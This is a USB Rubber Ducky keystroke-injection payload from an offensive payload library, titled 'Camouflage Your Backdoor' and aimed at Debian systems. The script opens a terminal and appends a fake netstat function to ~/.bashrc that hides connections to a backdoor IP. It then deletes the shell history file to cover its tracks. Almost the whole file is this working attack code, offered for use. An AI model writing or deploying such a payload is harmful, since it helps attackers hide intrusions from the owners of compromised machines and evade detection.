Path: blob/master/payloads/library/execution/Camouflage_Your_Backdoor/payload.txt
3018 views
REM_BLOCK1#############################################2# #3# Title : Camouflage Your Backdoor #4# Author : Aleff #5# Version : 1.0 #6# Category : Execution #7# Target : Debian based using .bashrc #8# #9#############################################10END_REM1112REM Here the IP of the backdoor that is to be camouflaged13DEFINE #BACKDOOR_IP_TO_CAMOUF example1415REM_BLOCK16Credits: Hak5 LLC17Website: https://hak5.org/18Source: https://github.com/hak5/usbrubberducky-payloads/blob/master/payloads/extensions/detect_ready.txt19END_REM2021EXTENSION DETECT_READY22REM VERSION 1.123REM AUTHOR: Korben2425REM_BLOCK DOCUMENTATION26USAGE:27Extension runs inline (here)28Place at beginning of payload (besides ATTACKMODE) to act as dynamic29boot delay3031TARGETS:32Any system that reflects CAPSLOCK will detect minimum required delay33Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms34END_REM3536REM CONFIGURATION:37DEFINE #RESPONSE_DELAY 2538DEFINE #ITERATION_LIMIT 1203940VAR $C = 041WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT))42CAPSLOCK43DELAY #RESPONSE_DELAY44$C = ($C + 1)45END_WHILE46CAPSLOCK47END_EXTENSION4849REM Open a shell50CTRL-ALT t51DELAY 10005253REM The script54STRINGLN_BASH55echo "function netstat() {56command netstat "$@" | grep -v #BACKDOOR_IP_TO_CAMOUF57}58" >> ~/.bashrc; rm $HISTFILE; exit59END_STRINGLN606162